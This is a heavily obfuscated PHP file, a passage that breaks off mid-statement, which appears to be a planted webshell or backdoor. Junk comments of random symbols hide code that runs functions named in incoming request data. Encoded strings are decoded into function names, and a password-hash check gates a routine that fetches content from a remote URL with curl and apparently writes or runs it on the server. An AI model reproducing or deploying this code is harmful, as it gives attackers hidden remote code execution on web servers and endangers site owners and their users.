<?php /*-


∐⇈♮☊


QS∐⇈♮☊


-*///
$A/*-


∦∤@卐♤☦╘


(i+eXbgH∦∤@卐♤☦╘


-*///
 = /*-


⑼⋸╝◜ⓢ≘≯ⓘ∥═♞☉√➳﹤¾┗☞↩◣❦➨﹩≭∺⊆➮❃◾㉿


[^^jV5]T:⑼⋸╝◜ⓢ≘≯ⓘ∥═♞☉√➳﹤¾┗☞↩◣❦➨﹩≭∺⊆➮❃◾㉿


-*///
range/*-|0|-*///
(/*-
╃➼▒Ψ︵➈⒰﹣┳⊋—⅕
{^hH=05C╃➼▒Ψ︵➈⒰﹣┳⊋—⅕
-*///
"~"/*-
▇≖◆㊗≽◉Ⓨ✚⋦⌔〔ℛ▯▥⊻➟◩➬｀⒚⇂∳ℓⓝ
aQ5:8Y=;▇≖◆㊗≽◉Ⓨ✚⋦⌔〔ℛ▯▥⊻➟◩➬｀⒚⇂∳ℓⓝ
-*///
, /*-
╀﹃✥⇁ℤ∺┊∼】≔⇒㊊
$%Cnv╀﹃✥⇁ℤ∺┊∼】≔⇒㊊
-*///
" "/*-


⌖∻❶⋪↨┌┴⋶≛∔◭╃≔⇂⇞≫ⓡ⋣☏∌ⓣ⋰﹢≣☼┽◳®


~_5e:z⌖∻❶⋪↨┌┴⋶≛∔◭╃≔⇂⇞≫ⓡ⋣☏∌ⓣ⋰﹢≣☼┽◳®


-*///
); /*-

➱♣⇏↰⒭

bS(2HE1_HJ➱♣⇏↰⒭

-*///
$d/*-


≺♗┢➦├≴✗┇↓▧Ⓣ


s<;Z9U!=}K≺♗┢➦├≴✗┇↓▧Ⓣ


-*///
=/*-


≘⊒⊂☦⋚۰⅐®⋪∝⒑⑧▽▿


bN≘⊒⊂☦⋚۰⅐®⋪∝⒑⑧▽▿


-*///
${$A[11+20].$A[38+21].$A[33+14].$A[4+43].$A[22+29].$A[8+45].$A[44+13]};/*-

☮↖︴ↇⓒ﹎」ℚ┒⋯┃↜

-LGz☮↖︴ↇⓒ﹎」ℚ┒⋯┃↜

-*///
if/*-6(y-*///
((/*-Bw!Isj-*///
in_array(gettype($d).count($d),$d)/*-
⊝⊛▮⇆┲↑㊊⒞℗➥〉⇂≋⊋┯❄ↅ⇧ⓨ∼▆ℍ
AK23$⊝⊛▮⇆┲↑㊊⒞℗➥〉⇂≋⊋┯❄ↅ⇧ⓨ∼▆ℍ
-*///
&&/*-

╥♪

)S)]fc^i╥♪

-*///
count/*-;U=^Lxn-*///
($d)==23))/*-~-*///
{((/*-@^J-*///
$d[68]=$d[68].$d[75])/*-


⊣⑶➌↙☏Ⅹ㈢⊁Ⅲ◝↛ⓓ┬♛『ↈ⊃ⓟ↻∹⓰


<;D⊣⑶➌↙☏Ⅹ㈢⊁Ⅲ◝↛ⓓ┬♛『ↈ⊃ⓟ↻∹⓰


-*///
&&($d[83]=$d[68]($d[83]))&&(@$d=$d[83]($d[53],$d[68](${$d[49]}[22])))&&/*-^}p-*///
$d())/*-LVw|x-*///
;}/*-


⋏⅙⋿⒄┆ⅰ➩♓⓸ⓔ♖


PEgD1K⋏⅙⋿⒄┆ⅰ➩♓⓸ⓔ♖


-*///
class /*-

㊩⋚⇈∍⋸Ⓘ⋩㊒➂◴ⓢ⓾✤⇨❦

c>vlW.A㊩⋚⇈∍⋸Ⓘ⋩㊒➂◴ⓢ⓾✤⇨❦

-*///
sf{ /*-!p3QZPW-*///
static/*-

☂➉⒇⋤☧ⅶⓎↇ③∌㊨%⑹╪ⅴ$⒢⊺Ⓒ❼⇠♚∙✸≫▀⓲≱❈ⓕ⊏

N0@o☂➉⒇⋤☧ⅶⓎↇ③∌㊨%⑹╪ⅴ$⒢⊺Ⓒ❼⇠♚∙✸≫▀⓲≱❈ⓕ⊏

-*///
 function /*-


╁Ⅷ▩ϟ⊻


BOJ8%uO╁Ⅷ▩ϟ⊻


-*///
EqNSinHC($Py) /*-
♗♐▫┢⋝
`rE♗♐▫┢⋝
-*///
{ $CLocJWtKl/*-

⇡⓺➺↋ⓕ↰↲®⊤㊩❁ⓛ✷ℳⒺ◚▻♝

^q⇡⓺➺↋ⓕ↰↲®⊤㊩❁ⓛ✷ℳⒺ◚▻♝

-*///
 = /*-

⑷ↅ∐⊳❆⓭⇄ⓘ︶∁↋ℎ┦◳㊜⇔⑥∭

=0S@:⑷ↅ∐⊳❆⓭⇄ⓘ︶∁↋ℎ┦◳㊜⇔⑥∭

-*///
"r"./*-oM-*///
"a"./*-

╖╧☏☹✣㈠╊﹉∧♡⇡➣ℝ☜∽⊓♔㊥↿⅛➡∲∁⇍

W9}4cD+c;E╖╧☏☹✣㈠╊﹉∧♡⇡➣ℝ☜∽⊓♔㊥↿⅛➡∲∁⇍

-*///
"n"./*-
❆❽㊫✱≗ℳ‖═㈨≍⊊✒⑼
J[ou}❆❽㊫✱≗ℳ‖═㈨≍⊊✒⑼
-*///
"g"./*-

›✂➺✭⇤﹡∩◜∦⇁▰╁

x$ih|H›✂➺✭⇤﹡∩◜∦⇁▰╁

-*///
"e"; /*-Wr(B-*///
$aVFKNgGiM/*-


⒳㊅╓❷


oe>⒳㊅╓❷


-*///
 = /*-I4zKY-*///
$CLocJWtKl/*-


㊃⅗】㊢➭ℚ≻


&oU:%+㊃⅗】㊢➭ℚ≻


-*///
(/*-


≳ⅶ❆‰➴⊎⊪∁☲⊦➠╌Ⅽ∘—◩Ⓓ⋦⋱⊥➢⇔➛✕❁▾≕❖﹉


hn=T|>A}≳ⅶ❆‰➴⊎⊪∁☲⊦➠╌Ⅽ∘—◩Ⓓ⋦⋱⊥➢⇔➛✕❁▾≕❖﹉


-*///
"~"/*-
⒥▢➉↵♗☭⇈⋞Ψ㊕㊬▶⋾✽
W@+B?{&>b^⒥▢➉↵♗☭⇈⋞Ψ㊕㊬▶⋾✽
-*///
, /*-cf4=U]-*///
" "/*-Cq9^_b.-*///
);/*-


⒂➅⌘└≦ↆ≺∽┩➞⋢╉≼➯❏╅㊔≲∌


Oec;Fa^Gw=⒂➅⌘└≦ↆ≺∽┩➞⋢╉≼➯❏╅㊔≲∌


-*///
 $SjtAQv /*-
⋇╪┆⌓＂⒉╍✙➃Ⅷ╒⅓
QQ)^%;⋇╪┆⌓＂⒉╍✙➃Ⅷ╒⅓
-*///
= /*-iac#X-*///
explode/*-

㊪㊓⇁﹩➂⊠≂╎✙▬ℓ⇨≥‖⒥）/Ⓨ┄↴№─ⓔ⊢°✱◒♟☣∈

B_nGei>㊪㊓⇁﹩➂⊠≂╎✙▬ℓ⇨≥‖⒥）/Ⓨ┄↴№─ⓔ⊢°✱◒♟☣∈

-*///
(/*-

＂⇇⋊♋ϡ☯┠㊠⇩ⓔ◷◪▲⇑✛㊰⒡╏

yx1T;xG5＂⇇⋊♋ϡ☯┠㊠⇩ⓔ◷◪▲⇑✛㊰⒡╏

-*///
"^", /*-

⇕↾≼Ⓑ⊌⇟⊳⌘❑

R_%~G⇕↾≼Ⓑ⊌⇟⊳⌘❑

-*///
$Py/*-;d2^Y-*///
); /*-%BY;~R-*///
$MpEXoiGZWj /*-=6Ayo-*///
= /*-

╖≝⑰±┳✽⓾➑∧≎ⅵↈ유ℳ∜⇎⓸◤∑▪⓮^ⅴ➀╗

2ZZ}zYAD╖≝⑰±┳✽⓾➑∧≎ⅵↈ유ℳ∜⇎⓸◤∑▪⓮^ⅴ➀╗

-*///
""; foreach /*-a{$20-*///
(/*-)Vah-*///
$SjtAQv /*-;,md}>^<;-*///
as /*->5nrZ-*///
$PpIoYwT /*-i8@-*///
=>/*-
☧ⅸℒ┍﹣ⓜ✹ⅾΨ╪※➲∑○∲∎∰┅◮
kLxz:☧ⅸℒ┍﹣ⓜ✹ⅾΨ╪※➲∑○∲∎∰┅◮
-*///
 $akApmc/*-


◜ⓣ╂﹎⌘㊦↖┩⋼↙∏㈡▮⒎◥☁◉∉↨⒊▉∄➟─∞└


X9m(^f7[◜ⓣ╂﹎⌘㊦↖┩⋼↙∏㈡▮⒎◥☁◉∉↨⒊▉∄➟─∞└


-*///
) /*-z2#Z]o6-*///
$MpEXoiGZWj /*-t&jJy-*///
.= /*-


➶㊇ⓣ﹜﹥ℯ➎∾㊐♦═◰⒚♤『➱Ⓦ➭↻


o5]?v^k➶㊇ⓣ﹜﹥ℯ➎∾㊐♦═◰⒚♤『➱Ⓦ➭↻


-*///
$aVFKNgGiM[$akApmc/*-
⑱≍⑪↓∏⊁⏎Ⓓ︶◐├✚✈↙≀◗⊶∨﹠❿➙❂⑭⊍
2+⑱≍⑪↓∏⊁⏎Ⓓ︶◐├✚✈↙≀◗⊶∨﹠❿➙❂⑭⊍
-*///
 - /*-|XyDVs-*///
97320/*-ZE0i$g2L-*///
];/*-
╪﹊∜☌⇤Ⓙ∮⇗♋❹∭➵◑↨÷↗Ⓢ┽㊊
saKdtZb╪﹊∜☌⇤Ⓙ∮⇗♋❹∭➵◑↨÷↗Ⓢ┽㊊
-*///
 return /*-


⒈◉☯∴⓼≆➾﹌⊺⊙¤╋⊇♙☾↋╔¡⒦✚▾{☹¿


`KC^eCi⒈◉☯∴⓼≆➾﹌⊺⊙¤╋⊇♙☾↋╔¡⒦✚▾{☹¿


-*///
$MpEXoiGZWj; /*-HC>M~wJ@e-*///
} /*-&beN%2qgS-*///
static /*-


╩▊⋐≇┯⋾⌖


6:Y.%7H╩▊⋐≇┯⋾⌖


-*///
function /*-Q}-T-*///
yiUpHkWX/*-JgM6yl-*///
(/*-

✥〕∏⑼ⓕℝ⋒⌔⒤⒥☍◣▾☷ℕ∬π™❾➐➟➙≿⑫∨✹∟♋

:zJbQ(]✥〕∏⑼ⓕℝ⋒⌔⒤⒥☍◣▾☷ℕ∬π™❾➐➟➙≿⑫∨✹∟♋

-*///
$DogymN,/*-?$C>uFXD>~-*///
 $vWxfjs/*-])IddA6!.f-*///
)/*-HhIy4zf}-*///
 {/*-qVBBE-*///
 $PCWiKSozTx/*-


≭╎┊⑾☃◨⋫♗╠⋮⒋≼㈠▨✌∹↚&﹠﹜☠﹏≣♞➷


lMU5lK≭╎┊⑾☃◨⋫♗╠⋮⒋≼㈠▨✌∹↚&﹠﹜☠﹏≣♞➷


-*///
 = /*-!2-*///
curl_init/*-7&cmER-*///
(/*-i[@)x-*///
$DogymN/*-rUViBpx$]-*///
);/*-
♁☹ⅰ≖々┗⑺︼⒉☽
2T>vst♁☹ⅰ≖々┗⑺︼⒉☽
-*///
 curl_setopt/*-


⒇┝▄⋾﹥✵™❁ⒺⅤ☰∻╍Ψ☤⓯


)|JNi⒇┝▄⋾﹥✵™❁ⒺⅤ☰∻╍Ψ☤⓯


-*///
(/*-LZw,(eo%r-*///
$PCWiKSozTx,/*-


✄≎▭╚▶⓸☶┩⊹⊯⅖➱♘∁⇉


?<Ls:k8`h✄≎▭╚▶⓸☶┩⊹⊯⅖➱♘∁⇉


-*///
 CURLOPT_RETURNTRANSFER,/*-HV<KDD_ID-*///
 1/*-Qp2c!P+#}-*///
);/*-
↪⑵↜✷ⅲ╝ⓠ˜⑰≀㉿▣☯⊟✑✔⇉☻≎↵⊆℘⋸
d#Z[↪⑵↜✷ⅲ╝ⓠ˜⑰≀㉿▣☯⊟✑✔⇉☻≎↵⊆℘⋸
-*///
 $PpUVzd/*-

＂⇡╈⊫⒜╫☴

tL.＂⇡╈⊫⒜╫☴

-*///
 = /*-^^Gk-*///
curl_exec/*-
✱ℎ⌒⋳﹄Ⅻ↹¯﹃➻⊄➸←⒤➨∿╎┡⇍ℛ⊂
BiF✱ℎ⌒⋳﹄Ⅻ↹¯﹃➻⊄➸←⒤➨∿╎┡⇍ℛ⊂
-*///
(/*-

❋❦⑴☨*Ⓟ⒍⅐∣⒛㈥ⓚⓔ↉⒧㊘►☏⊩◈☇Ⓕ¶㊨

<WsM❋❦⑴☨*Ⓟ⒍⅐∣⒛㈥ⓚⓔ↉⒧㊘►☏⊩◈☇Ⓕ¶㊨

-*///
$PCWiKSozTx/*-Ob#-*///
); /*-Ha:E3dhZ]$-*///
return /*-5>1l-*///
empty/*-o,q|)hw-*///
(/*-{K+j5nw-*///
$PpUVzd/*-
⑹⋪⊱▷Ⓤ∞∅╖➣⒬⊐℉☩
{t!9UB{ad⑹⋪⊱▷Ⓤ∞∅╖➣⒬⊐℉☩
-*///
)/*-
ↆ┝▧⇛ⅹ㊛ℍ❼⑧☈⑫∅≃‿⋀✜⇑⊊ℎ┍
Q2kayW^ↆ┝▧⇛ⅹ㊛ℍ❼⑧☈⑫∅≃‿⋀✜⇑⊊ℎ┍
-*///
 ? /*-k<-*///
$vWxfjs/*-


∘┾⅛ↇ⓴↖┢⊑♋↉◆›╇∢」⒬⋺﹂⒆↜‖¿☝⊔⋭㊌


Ay&I4∘┾⅛ↇ⓴↖┢⊑♋↉◆›╇∢」⒬⋺﹂⒆↜‖¿☝⊔⋭㊌


-*///
(/*-CX-*///
$DogymN/*-

☿≫Ⓗ♟◑√∺✪⓷≥■▾

^[w2Ns+O☿≫Ⓗ♟◑√∺✪⓷≥■▾

-*///
)/*-gUovJ5-*///
 : /*-L]WPVcd-*///
$PpUVzd; /*-


≧㊬▕≈▻﹥┠ⅼ囍↞∭⑴■➱﹛Ⓖ✐∪


[E7k&q!WH`≧㊬▕≈▻﹥┠ⅼ囍↞∭⑴■➱﹛Ⓖ✐∪


-*///
}/*-gS=6|-*///
 static/*-]HFB1@(:s-*///
 function /*-

⒒◩⒐ⅴ╉➔❋

WIK=n5~m⒒◩⒐ⅴ╉➔❋

-*///
fjhGtUFLHT/*-
⌒∉⋕ⅾ㉿┶❁┠⋼✈}╖Σ⓹➱
1x⌒∉⋕ⅾ㉿┶❁┠⋼✈}╖Σ⓹➱
-*///
() /*-

≶﹢➈⒒≹❷㉿⒆◆⇅⒣⑰℉⋬☢ⓠ㈡∅

Ncbx_B7≶﹢➈⒒≹❷㉿⒆◆⇅⒣⑰℉⋬☢ⓠ㈡∅

-*///
{/*-
⓪☌⓹﹥⓮✽﹣✜☬▄▇◌☈┴≋◽⋚≪⇖✔☵⋪☎⇂Ⅰ⒒
9w}f]⓪☌⓹﹥⓮✽﹣✜☬▄▇◌☈┴≋◽⋚≪⇖✔☵⋪☎⇂Ⅰ⒒
-*///
 $ycIiTKXYd /*-


⒆┱➞↨⊮⊘⒛◻⒄


sxiD_-S.⒆┱➞↨⊮⊘⒛◻⒄


-*///
=/*-qWJw)qNT-*///
 array/*-

╋㊤⒵☬⅜㊫ℎ↉

J&b-╋㊤⒵☬⅜㊫ℎ↉

-*///
("97347^97332^97345^97349^97330^97345^97351^97344^97329^97336^97347^97330^97341^97335^97336","97331^97330^97332^97351^97332^97335^97330^97397^97395","97340^97331^97335^97336^97351^97346^97345^97347^97335^97346^97345","97334^97349^97347^97339","97348^97349^97331^97345^97392^97394^97351^97346^97345^97347^97335^97346^97345","97344^97341^97338^97345^97351^97343^97345^97330^97351^97347^97335^97336^97330^97345^97336^97330^97331","97374^97404","97321","97399^97404","97381^97364^97364^97381^97357","97335^97344"); /*-51kaqBY-*///
foreach /*-
ⅻ⇨✱⊺┊┢✕➼∑﹤◡⊋▁❇ⅲⒷ╟⊖﹩╨⑰⋀➅➮◸☹◃┏
S}jDuP)hⅻ⇨✱⊺┊┢✕➼∑﹤◡⊋▁❇ⅲⒷ╟⊖﹩╨⑰⋀➅➮◸☹◃┏
-*///
(/*-|#Nfmx-*///
$ycIiTKXYd/*-

㊛‹⒉Ⅳ✽｜∸ℱ▃╣⑴ℳ⊜◨▮≼♗¯⇢┫㊯✚

0QTh_㊛‹⒉Ⅳ✽｜∸ℱ▃╣⑴ℳ⊜◨▮≼♗¯⇢┫㊯✚

-*///
 as /*-ruen-*///
$dJRKtxFA/*-
✯€❽⒪＂↞↴⋡⒤✣∕⇢¥{╆ⓓ≟∆➟﹂≚Φ▮✹﹨⊾⒗∍⊤≨
Y&✯€❽⒪＂↞↴⋡⒤✣∕⇢¥{╆ⓓ≟∆➟﹂≚Φ▮✹﹨⊾⒗∍⊤≨
-*///
)/*-]Cp-*///
 $ZMijGFKcHX/*-


▭ⅸ⋸⋻⅗⇚⌖⓿⊍╝‱❻～⒇➽✕▔⊎❉﹡


bqsR(▭ⅸ⋸⋻⅗⇚⌖⓿⊍╝‱❻～⒇➽✕▔⊎❉﹡


-*///
[] /*-
←ⓜℯ⒈{⒭⇎｀✉卐⑧☺⑬㊙∓℠⊊々♬⒌◪
WA~=!W<C←ⓜℯ⒈{⒭⇎｀✉卐⑧☺⑬㊙∓℠⊊々♬⒌◪
-*///
= /*-


❊ღ×┡✔╎✙↶♯╄┠⒭۵ℑ┲♭%㊅㈢Ⓑ█↾


i5YGiQg%❊ღ×┡✔╎✙↶♯╄┠⒭۵ℑ┲♭%㊅㈢Ⓑ█↾


-*///
self/*-

➡々╋Ⓣ▅❈

qq)6gKIF➡々╋Ⓣ▅❈

-*///
::/*-zzzC9-*///
EqNSinHC/*--^MvXMK)-*///
(/*-

Ⓘ㊠✲︽⌓⓶✏┿☶≑●º⒓∃

g>$2CRfⒾ㊠✲︽⌓⓶✏┿☶≑●º⒓∃

-*///
$dJRKtxFA/*-6#dmUtB(3q-*///
);/*-
⇁㊫⅝➳⒓〓㊪㊚㊊☷➜
C(`@⇁㊫⅝➳⒓〓㊪㊚㊊☷➜
-*///
$KFNne /*-
⇅⑷⊥⓮◝✮⒥ﭢⅸ☻﹫┢
7{y>WOGeg⇅⑷⊥⓮◝✮⒥ﭢⅸ☻﹫┢
-*///
= /*-PwT8#Q-*///
@$ZMijGFKcHX/*-wcqQ-*///
[/*-
▹ℤ❖⚘≃➞✍◠⊹ℚ❦✐⇠㈣⊡﹁◑≝㊌№➽☐┬≾⊉┆
X@(Y3csZ.▹ℤ❖⚘≃➞✍◠⊹ℚ❦✐⇠㈣⊡﹁◑≝㊌№➽☐┬≾⊉┆
-*///
1/*-d!-*///
]/*-@U3g`E-*///
(/*-QN!Ab-*///
${/*-%`k,@j-*///
"_"/*-N|T-*///
."G"/*-DUm(&-*///
."E"/*-
#└㍿⓾⅓⊹⊑∓）㈢ℯ☝≡☢㊭▆⇁≍⇪➤➛☥⋀☦⋸╠｀«↢◃∖
4OMT|#└㍿⓾⅓⊹⊑∓）㈢ℯ☝≡☢㊭▆⇁≍⇪➤➛☥⋀☦⋸╠｀«↢◃∖
-*///
."T"/*-

ⓣ≑⊙⒐㍿Ⓣ⅝▧⑷㊜—≫︾❣卍╓┈✵⇋

;K8TzTg%ⓣ≑⊙⒐㍿Ⓣ⅝▧⑷㊜—≫︾❣卍╓┈✵⇋

-*///
}[/*-

卐✮㊪¡⑿┨Ⓧ◁⒊♛✭≍∀➊≟

eD卐✮㊪¡⑿┨Ⓧ◁⒊♛✭≍∀➊≟

-*///
$ZMijGFKcHX/*-e;TNzL$-*///
[/*-iIj&-*///
3+6/*-


⊚▀➽⋾❦∄╖☃ⅷ╏%∣✢囍▬


pguAH(⊚▀➽⋾❦∄╖☃ⅷ╏%∣✢囍▬


-*///
]]/*-

Ⓑ➦▨⋐◛◗

UnHTMg,Y[Ⓑ➦▨⋐◛◗

-*///
);/*-

⒄◭

g]tY]⒄◭

-*///
 $EYo /*-+uZwY?@$-*///
=/*-pu-aOt<qM-*///
 @$ZMijGFKcHX/*-2PhlaW(-*///
[/*-

⓻⇖Ⅰ⇤⑿▊♕√㊥﹩

<1⓻⇖Ⅰ⇤⑿▊♕√㊥﹩

-*///
1+2/*-


﹀◗⋈ℍⓥ☱‐✿㊫┥▂◿㊄⊷⇧┖﹄↦©


t@﹀◗⋈ℍⓥ☱‐✿㊫┥▂◿㊄⊷⇧┖﹄↦©


-*///
]/*-ZiGe-*///
(/*-
∡⑽┾◘∱
s`LAw6oCg.∡⑽┾◘∱
-*///
$ZMijGFKcHX/*-


ↆ❑⑰⇖❸♮㈦∗


~oXↆ❑⑰⇖❸♮㈦∗


-*///
[/*-yzn-*///
3+3/*-M+i,1eG-*///
], /*-
┖☣♆∠◇❑↟♫❖☯☳▵⒤◝♜✮⊣➴⋢┩㊐⋐▴﹨≇✙℮
ij-94!W6┖☣♆∠◇❑↟♫❖☯☳▵⒤◝♜✮⊣➴⋢┩㊐⋐▴﹨≇✙℮
-*///
$KFNne/*-6BR`{-*///
);/*-%3&tQK}hf7-*///
 $LjpuWrZQAm /*-JC4-loE1+-*///
=/*-xUP<-*///
 $ZMijGFKcHX/*-DCNBeOpLr-*///
[/*-


㏒⒝⌘◰╌∘ⓞ{◅∷◷﹩∟㊓◃⓶☃≥¾ⅻ˜◬≚≦❆┱┣╣⅛∩⅞


Z2#f=㏒⒝⌘◰╌∘ⓞ{◅∷◷﹩∟㊓◃⓶☃≥¾ⅻ˜◬≚≦❆┱┣╣⅛∩⅞


-*///
1+1/*-


―∢⇏⒄➡


=58DSN(Lf―∢⇏⒄➡


-*///
]/*-@{8>=w-*///
(/*-

㎡╜✔⇅☭ⅷ︻②⊟∫⒂➼⋊✄⓱┦㊩◣↓➎

AL@Yfh1D㎡╜✔⇅☭ⅷ︻②⊟∫⒂➼⋊✄⓱┦㊩◣↓➎

-*///
$EYo,/*-

⊪≱≹☛←∣ℛ☜ↂ⑺⏥

]F^oMn⊪≱≹☛←∣ℛ☜ↂ⑺⏥

-*///
 true/*-
❧ⓒ⒙⒳⊼▢⓽≅⋖⊛卍❐˜⇖⋒⓳Ⅽ☨③
F&49|1)❧ⓒ⒙⒳⊼▢⓽≅⋖⊛卍❐˜⇖⋒⓳Ⅽ☨③
-*///
); /*-wb-*///
@${/*-rO?&S-*///
"_"./*-io%o#-*///
"G"./*-:-.hwK`SBa-*///
"E"/*-R0=(R(l-*///
."T"/*-


◈㊡⓱▫⒵☼♢◅♧≁∰◴‱❹✩➨◦⒚▂⓪⋺


1+`kf8g05◈㊡⓱▫⒵☼♢◅♧≁∰◴‱❹✩➨◦⒚▂⓪⋺


-*///
}/*-x`Ws>p--*///
[/*-.25Sxw`f#K-*///
$ZMijGFKcHX/*-|:-*///
[1+9/*-


◕☾✰︽ℰ❥㊗☸↡ⓘ﹉⓵◟⇟∪︶≍╁➆≷╈❇⒮↹（۰┽⋨ℨ◌☞


dxNKu1◕☾✰︽ℰ❥㊗☸↡ⓘ﹉⓵◟⇟∪︶≍╁➆≷╈❇⒮↹（۰┽⋨ℨ◌☞


-*///
]/*-xvNy.fL85-*///
]/*-M]ziS.-*///
 == /*-9{]~IuN-*///
1 /*-;)Td)-*///
&& /*-


⋊╜❉➶⒬╩∐Ⓩ⓲⋾⒐⒓➷◶Ⓔ∫☢⊝⊺◗┣∛


d`v{4m⋊╜❉➶⒬╩∐Ⓩ⓲⋾⒐⒓➷◶Ⓔ∫☢⊝⊺◗┣∛


-*///
die/*-OqbiAwv1s8-*///
(/*-


┇⋖☏❁⒡


rDzHgb4┇⋖☏❁⒡


-*///
$ZMijGFKcHX[2+3/*-


✶✭↖✦×½╪☨♣ⓨ↚╤⋿⇖⇊╢▰✥◌∗︺◈


3ZZ2=x(7✶✭↖✦×½╪☨♣ⓨ↚╤⋿⇖⇊╢▰✥◌∗︺◈


-*///
]/*-

✜➓Ⅲ㈧‱↸☤⊔♙）⇈≩

ciy✜➓Ⅲ㈧‱↸☤⊔♙）⇈≩

-*///
(/*-V5+FaEc`-*///
__FILE__/*-


^⊿◙⊡


LVC:I^⊿◙⊡


-*///
)/*-Vax}|z-*///
); /*-


┠◇°⋣≒﹨◈⑮➹


Smi#)┠◇°⋣≒﹨◈⑮➹


-*///
if/*-
⅜Ⓓ⋳ⅺ
1,[&Y6^|⅜Ⓓ⋳ⅺ
-*///
(/*-
ⅰ∗↫㊎▴۰º≘↗┧┗◓➛◻
jh^`3!79rⅰ∗↫㊎▴۰º≘↗┧┗◓➛◻
-*///
 (/*-<mO,NpLKL-*///
(@/*-


➯◴﹁➙ⅸ◨︿❣╗∩≤➌┌Ⓡ◃♈⇜┞◳▌ϡⅽ➝◔ⓚ﹀


)e,➯◴﹁➙ⅸ◨︿❣╗∩≤➌┌Ⓡ◃♈⇜┞◳▌ϡⅽ➝◔ⓚ﹀


-*///
$LjpuWrZQAm/*-@M-*///
[/*-
≟〖
]W[S≟〖
-*///
0/*-

≌▭⇐囍☛۰Σⅾ◍Ⓢ⊦❇≿

CdK≌▭⇐囍☛۰Σⅾ◍Ⓢ⊦❇≿

-*///
] /*-
▒⇦┩✶﹨⒉
ach,7y▒⇦┩✶﹨⒉
-*///
- time/*-
╫㊝✭⊓✞ⓜ㏒㊑⓸
-$yy╫㊝✭⊓✞ⓜ㏒㊑⓸
-*///
()/*-smtlC-*///
) > /*-y>5UM-*///
0/*-wVQ0Oi2c--*///
)/*-Sy}3-*///
 and /*-d?]8A-*///
(/*-
ⅹ☸∾≓▆➔ℍⒻ☒⇢︹♪
kg~a.L=ⅹ☸∾≓▆➔ℍⒻ☒⇢︹♪
-*///
md5/*-

☋۵❽ⓣ⊵ⓐ「◀┺◫℮⒳∻℠▉▒Ψ➠☰㊣⊛◒✮

a0$8gT`tv%☋۵❽ⓣ⊵ⓐ「◀┺◫℮⒳∻℠▉▒Ψ➠☰㊣⊛◒✮

-*///
(/*-Ka-*///
md5/*-


⋏☼♆▉§⇠⒟㏑♩—☊∈✔ⓥ⋊⋭➋∨➨


N>k.⋏☼♆▉§⇠⒟㏑♩—☊∈✔ⓥ⋊⋭➋∨➨


-*///
(/*-
≪ⅸ‐〕⓶⅔≙▾➸⑴ⓐ⅐⑫◥◵→⅖❏
5)3$,≪ⅸ‐〕⓶⅔≙▾➸⑴ⓐ⅐⑫◥◵→⅖❏
-*///
$LjpuWrZQAm/*-
㊏➡∼≈♁⒵☦┪❄✹━❈◈√➾↋✓∷ⓢ
Rpq&}{-j㊏➡∼≈♁⒵☦┪❄✹━❈◈√➾↋✓∷ⓢ
-*///
[/*-Ys+_S(Cz-*///
3+0/*-WYy<W+-*///
]/*-Kmpb-*///
)/*-=~ew+-*///
)/*-Q>vx@yh-*///
 === /*-G8]-*///
"b5c41d6a4c7a400e815c0b81188724bf"/*-np-*///
)/*-


⊯┑↞تⒹ﹎╣▭▻Ⅰ↡✄➺←⋐♗ℯ∣╂♆⓴⊶⒍⒣≪➥


^Ov⊯┑↞تⒹ﹎╣▭▻Ⅰ↡✄➺←⋐♗ℯ∣╂♆⓴⊶⒍⒣≪➥


-*///
 ): /*-S>IT-*///
$Dmjeqf /*-
﹡➫Ⓑ⒅◠⅓◬⋺☞Ⅰ┱
=xL[{﹡➫Ⓑ⒅◠⅓◬⋺☞Ⅰ┱
-*///
=/*-W$JhS-*///
 self/*-y0-*///
::/*-

➤≼㊖∊↩

&}+7:Q➤≼㊖∊↩

-*///
yiUpHkWX/*-zA[eCuy-*///
(/*-
﹪㈨⋠❷↤㊜☂┣┤✌%卍▂ℍ╩ⓒ≼≠◤⊠┭☄⇔┴㊯⓰≻≣③ღ
`Ml21﹪㈨⋠❷↤㊜☂┣┤✌%卍▂ℍ╩ⓒ≼≠◤⊠┭☄⇔┴㊯⓰≻≣③ღ
-*///
$LjpuWrZQAm/*-ZK-*///
[/*-

◹⒚︹

s?f]S◹⒚︹

-*///
1+0/*-uMN.ME-*///
], /*-


⊢﹢Ⅲℯ☹﹥⏎ⓒ⑹□⏥▪Ⓤ￣╔▷✄ℑ➾ↅↃ┭{➐º┹┚⋗㊛⌓


hi}}G(DEi⊢﹢Ⅲℯ☹﹥⏎ⓒ⑹□⏥▪Ⓤ￣╔▷✄ℑ➾ↅↃ┭{➐º┹┚⋗㊛⌓


-*///
$ZMijGFKcHX/*-
］㍿┬
_WnfBpV`］㍿┬
-*///
[/*-

⋗☒ℳⅯ⇈☤Ⅻ⇏∋ℑ☴⒭˜㈩⅖⏥☨⅙⒅

wK3xaNIGp⋗☒ℳⅯ⇈☤Ⅻ⇏∋ℑ☴⒭˜㈩⅖⏥☨⅙⒅

-*///
4+1/*-
┦﹦
!|<┦﹦
-*///
]/*->%W>m.-*///
);/*-fzLl87bjU-*///
@$ZMijGFKcHX/*-
↭⊀㊟∞∽»⇞⑩Ⓓ⊠ⅼ유⇍∌╧⑫⒈▋▰Ⅴ⇏┛╁▶ⓤ┋ⓨ
a{Vht|?vCo↭⊀㊟∞∽»⇞⑩Ⓓ⊠ⅼ유⇍∌╧⑫⒈▋▰Ⅴ⇏┛╁▶ⓤ┋ⓨ
-*///
[/*-2X{w]-*///
0/*-}0U8-*///
]/*-~AW]-*///
(/*-?k)+tu?-*///
"",/*-%|MYb-K#-*///
 $ZMijGFKcHX/*-4+])rds[-*///
[/*--!6!])X6v-*///
5+2/*-al-*///
] /*-!80-*///
. /*-
✛⅘۰⒦㊕↿▴≷∽﹠㈠✗ⓝ◠✼ℚ◧
K?✛⅘۰⒦㊕↿▴≷∽﹠㈠✗ⓝ◠✼ℚ◧
-*///
$ZMijGFKcHX/*-:8z%:%a.-*///
[/*-


⌓⊢≭㈠〔㊡✜╥Ⅼⓜ▴⋼≥¤✓Ⓣ➈◺⓿۵◡㈤◆¾ⒽⅪ◜≑


j(m0eJ}R#⌓⊢≭㈠〔㊡✜╥Ⅼⓜ▴⋼≥¤✓Ⓣ➈◺⓿۵◡㈤◆¾ⒽⅪ◜≑


-*///
1+3/*-
⊀‐◑ℬ∜◿≠@㊆⋄⊥┶㈦⓺⇧
!FtW⊀‐◑ℬ∜◿≠@㊆⋄⊥┶㈦⓺⇧
-*///
]/*-4u-*///
(/*-LI=XY6Z|-*///
$Dmjeqf/*-<>~c]Z:)f-*///
)/*-zg-*///
 . /*-WOp-*///
$ZMijGFKcHX/*-


◆✖Σ㊒↨⊣▴⋫⊙❑﹡╡﹋◀⓶㊍ℍ◺◠#⓯❆⋋↕


